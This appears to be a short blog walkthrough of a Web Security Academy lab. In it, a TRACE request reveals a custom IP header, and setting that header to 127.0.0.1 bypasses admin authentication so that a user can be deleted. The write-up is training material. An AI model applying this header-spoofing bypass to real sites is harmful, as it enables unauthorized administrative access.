4.11.web auth bypass via info disclosure(Web Security Academy)

Web Security Academy >> Information disclosure >> Exploiting >> Lab

Learn to log in using the username and password : wiener:peter

browse to GET /admin :

If we go to the Burp :

We can change the GET in the TRACE , By sending it to Repeater :

Then :

This X-Custom-IP-Authorization header has the IP address “156.174.229.54”. IP addresses are commonly used to identify communication sources in networks. In this case, the header could be part of a custom authentication system where IP addresses are used to determine access to resources or services.

X-Custom-IP-Authorization: 127.0.0.1

If we change “X-Custom-IP-Authorization: 156.174.229.54” to “X-Custom-IP-Authorization: 127.0.0.1”……………….\ This X-Custom-IP-Authorization header has the IP address “127.0.0.1”. The address 127.0.0.1 refers to the address of “localhost” or your computer itself. Mostly, this type of header is used to validate requests or to manage access. This header can have different meanings depending on the context in which it is used, for example if it is part of a custom authentication scheme, if we use it with GET in the TRACE and set X-Custom-IP-Authorization: 127.0.0.1 with the request .

So I’m going to run intercept , Let us change the order as follows\ We will add “X-Custom-IP-Authorization: 127.0.0.1” to each request :

in this way , Then we will delete the user carlos :

Don’t forget to put “X-Custom-IP-Authorization: 127.0.0.1” in each request :

Congratulations, you solved the lab!

See you soon in other reports….!!

Abdelwahab_Shandy

AS_Cyber